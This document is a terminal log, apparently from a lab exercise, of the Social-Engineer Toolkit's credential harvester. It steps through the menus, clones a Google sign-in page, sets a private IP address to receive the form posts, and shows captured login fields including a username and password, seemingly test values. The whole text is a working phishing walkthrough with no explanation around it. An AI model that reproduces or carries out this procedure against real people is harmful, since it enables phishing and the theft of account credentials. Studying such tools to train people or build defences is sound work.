Set_social Engineer_toolkit_Credential_Harvester
resumen en portada
em50l@jejo.es$
[---] The Social-Engineer Toolkit (SET) [---] Welcome to the Social-Engineer Toolkit (SET). Select from the menu: 1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) Wireless Access Point Attack Vector 8) QRCode Generator Attack Vector 9) Powershell Attack Vectors 10) SMS Spoofing Attack Vector 11) Third Party Modules 99) Return back to the main menu. set> 2 1) Java Applet Attack Method 2) Metasploit Browser Exploit Method 3) Credential Harvester Attack Method 4) Tabnabbing Attack Method 5) Web Jacking Attack Method 6) Multi-Attack Web Method 7) Full Screen Attack Method 8) HTA Attack Method 99) Return to Main Menu set:webattack>3 1) Web Templates 2) Site Cloner 3) Custom Import 99) Return to Webattack Menu set:webattack>1 [-] Credential harvester will allow you to utilize the clone capabilities within SET [-] to harvest credentials or parameters from a website as well as place them into a report ------------------------------------------------------------------------------- --- * IMPORTANT * READ THIS BEFORE ENTERING IN THE IP ADDRESS * IMPORTANT * --- The way that this works is by cloning a site and looking for form fields to rewrite. If the POST fields are not usual methods for posting forms this could fail. Enter the IP address for POST back in Harvester/Tabnabbing: 192.168.56.102 -------------------------------------------------------- 1. Java Required 2. Google 3. Twitter set:webattack> Select a template:2 [*] Cloning the website: http://www.google.com [*] This could take a little bit... The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website. [*] You may need to copy /var/www/* into /var/www/html depending on where your directory structure is. Press {return} if you understand what we're saying here. [*] The Social-Engineer Toolkit Credential Harvester Attack [*] Credential Harvester is running on port 80 [*] Information will be displayed to you as it arrives below: 192.168.56.101 - - [06/Aug/2019 09:18:36] "GET / HTTP/1.1" 200 - [*] WE GOT A HIT! Printing the output: PARAM: GALX=SJLCkfgaqoM PARAM: continue=https://accounts.google.com/o/oauth2/auth?zt=ChRsWFBwd2JmV1hIcDhtUFdldzBENhIfVWsxSTdNLW9MdThibW1TMFQzVUZFc1BBaURuWmlRSQ%E2%88%99APsBz4gAAAAAUy4_qD7Hbfz38w8kxnaNouLcRiD3YTjX PARAM: service=lso PARAM: dsh=-7381887106725792428 PARAM: _utf8=☃ PARAM: bgresponse=js_disabled PARAM: pstMsg=0 PARAM: dnConn= PARAM: checkConnection= PARAM: checkedDomains=youtube POSSIBLE USERNAME FIELD FOUND: Email=pp POSSIBLE PASSWORD FIELD FOUND: Passwd=pp PARAM: signIn=Sign+in PARAM: PersistentCookie=yes [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.